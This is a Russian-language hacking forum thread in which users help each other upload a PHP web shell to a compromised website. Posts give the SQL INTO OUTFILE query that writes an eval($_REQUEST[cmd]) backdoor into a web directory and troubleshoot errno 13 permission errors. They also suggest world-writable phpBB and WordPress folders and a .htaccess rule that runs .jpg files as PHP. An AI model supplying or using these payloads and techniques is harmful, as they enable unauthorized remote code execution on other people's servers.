я думал проще не обращать внимания на них // я не совсем понимаю о чем разговор, но уверен что попал в точку
Блин, ну как мне ещё объяснить подобную фигню с base64 на русском языке? Драмчик иди танцуй Это хорошо Это ещё не конец запретов, просто всё потихоньку.
Для тех, кто не в курсе - из base64 кодировки можно спокойно вырезать все "=" - и будет работать также прекрасно (запостенно только потому, что ТС удалил свои косяки, связанные с этим моментом, что не добавит образованности остальным)
Не надо загаживать тему, соблюдаем правила. Статусных пользователей это тоже касается. Для свободного общения есть болталка.
подскажите что делаю не так узнал путь /home/site.ru/html/phpmyadmin/ проверил привилегии - есть (Y) выполняю запрос select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php' получаю ответ: Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13) пробывал и в /home/site.ru/html/ все равно не хочет
Попробуй найти папку с изображениями, например она может быть тут /home/site.ru/html/images она обычно открыта на запись...
1) зачем тему апать? 2)error code 13 -недостаточно прав на запить.Папка с изображениями редко имеет права на запись если уж права расставлены более менее правильно. 3)Я в данном случае пытаюсь определить смс на который сайт крутится ,а дальше гугли ее архитектуру и ищи папки с правами 0777 по дефоту. Например если это phpbb=>cache ,store Wp=>upload,wp-content/themes/%тема%/ И т.д.
тема требовала ответа, вот и ответил. Раз были уязвимости, какая может речь идти о грамотной настройке и распределении прав?!
Неплохо бы сначала select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/tmp/1.php' select load_file('/tmp/1.php') проверять... Если всё работает - то FILE_PRIV в норме. И вот только тогда начинать "угадывать" папку для заливки шелла
Apparmor , либо нету прав на запись. Да и from mysql.user не нужен. Достаточно select '<?php eval($_REQUEST[cmd]); ?>' into outfile '/home/site.ru/html/phpmyadmin/shell.php'
Че то этот метод у меня не работает. Просто картинка в браузере открывается и все. Как правильней надо делать?
Попытался залить через phpmyadmin к сожелению ошибка 1045 - Access denied for user 'bd_hjgy'@'localhost' (using password: YES)
Может у тебя просто в .htaccess PHP отключен в каталоге с картинками или не прописано там расширение? Из той же статьи: Создаём файлик .htaccess, и вписываем в него следующее: PHP код: AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker